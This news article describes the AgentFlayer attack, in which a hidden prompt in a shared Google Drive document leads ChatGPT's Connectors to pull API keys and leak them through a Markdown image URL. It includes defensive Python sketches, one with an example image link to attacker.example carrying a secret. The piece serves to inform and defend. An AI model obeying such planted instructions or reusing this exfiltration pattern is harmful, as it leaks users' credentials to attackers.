
An infected document can leak data on Google Drive via ChatGPT (Photo: Wired).
What makes the finding especially worrying is that the vulnerability requires no action from the user, raising fresh concerns about cybersecurity as artificial intelligence (AI) models become increasingly connected to personal data.
“Poisoned” documents lead to data leaks
At the Black Hat security conference in Las Vegas (USA) on August 6, security researchers Michael Bargury and Tamir Ishay Sharbat demonstrated an attack method called AgentFlayer.
This attack exploits a vulnerability in Connectors – a feature that connects ChatGPT with external services such as Google Drive, Gmail or Microsoft Calendar.
“A user doesn’t need to do anything to be compromised or have their data leaked,” said Michael Bargury, CTO of security firm Zenity. “We’ve proven it’s completely zero-click.”
The attack begins with the attacker sharing a “poisoned” document with the victim’s Google Drive. The document contains a malicious prompt of about 300 words, written in white, 1-point font – almost invisible to the naked eye but fully readable by the machine.
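To make this concrete, the sketch below shows one way such near-invisible text could be flagged before a document is trusted. It is illustrative only, not part of the researchers' work: it assumes the poisoned file is a .docx, uses the python-docx library, and the file name and size threshold are hypothetical.

```python
# Sketch: flag near-invisible runs (tiny font or white text) in a .docx file.
# Assumes the python-docx package; file name and thresholds are illustrative only.
from docx import Document
from docx.shared import RGBColor

WHITE = RGBColor(0xFF, 0xFF, 0xFF)

def find_hidden_runs(path, max_pt=2.0):
    doc = Document(path)
    suspicious = []
    for para in doc.paragraphs:
        for run in para.runs:
            size = run.font.size                  # None means "inherited from style"
            color = run.font.color.rgb            # None when no explicit RGB color is set
            tiny = size is not None and size.pt <= max_pt
            white = color == WHITE
            if tiny or white:
                suspicious.append(run.text)
    return suspicious

if __name__ == "__main__":
    for text in find_hidden_runs("shared_meeting_notes.docx"):
        print("Possible hidden instruction:", text[:80])
```

A check like this only catches one hiding technique (tiny or white text); it would not detect instructions concealed in comments, metadata, or images.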
On the surface, the text is disguised as meeting notes. In reality, it contains instructions for ChatGPT to find and extract sensitive API keys from the victim's Google Drive account.
When the victim later asks ChatGPT to summarize the document, the hidden prompt instead instructs the AI to embed any API keys it finds in a Markdown image link pointing to an external server. As the image is fetched for rendering, the request carries the stolen data to the attacker's server.
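To illustrate the exfiltration channel and one common countermeasure, here is a minimal sketch (not OpenAI's actual mitigation) of a client-side filter that refuses to render Markdown images whose URLs point outside an allow-list of trusted hosts. All domain names and the example output are hypothetical.

```python
# Sketch of a client-side defense: strip Markdown image links whose host is not
# on an allow-list before rendering model output. Domains here are hypothetical.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"files.example-trusted-cdn.com"}

IMAGE_MD = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def sanitize_markdown(text: str) -> str:
    def replace(match: re.Match) -> str:
        host = urlparse(match.group("url")).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)          # trusted host: keep the image
        return "[image removed: untrusted host]"
    return IMAGE_MD.sub(replace, text)

if __name__ == "__main__":
    model_output = "Summary done. ![status](https://attacker.example/log?key=SECRET)"
    print(sanitize_markdown(model_output))
    # -> "Summary done. [image removed: untrusted host]"
```

The point of the sketch is simply that the image URL itself is the leak: if the renderer never contacts untrusted hosts, the hidden prompt has no channel to send data out.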
OpenAI has issued a fix, but risks remain
OpenAI quickly implemented mitigations after receiving Bargury's report. "It's important to develop robust defenses against prompt injection attacks," said Andy Wen, senior director of security product management at Google Workspace.
Although the flaw has been patched, the incident highlights the potential risks of connecting large language models (LLMs) to external systems. As AI becomes more deeply integrated into our lives and work, the attack surface that hackers can exploit also expands.
Experts warn that indirect prompt injection can become a serious threat, allowing attackers to take control of many smart systems, from smart homes to enterprise infrastructure.
“Connecting LLMs to external data sources is powerful, but as is often the case with AI, with more power comes more risk,” Bargury concludes.
Source: https://dantri.com.vn/cong-nghe/canh-bao-lo-du-lieu-luu-tru-tren-google-drive-thong-qua-chatgpt-20250807155706949.htm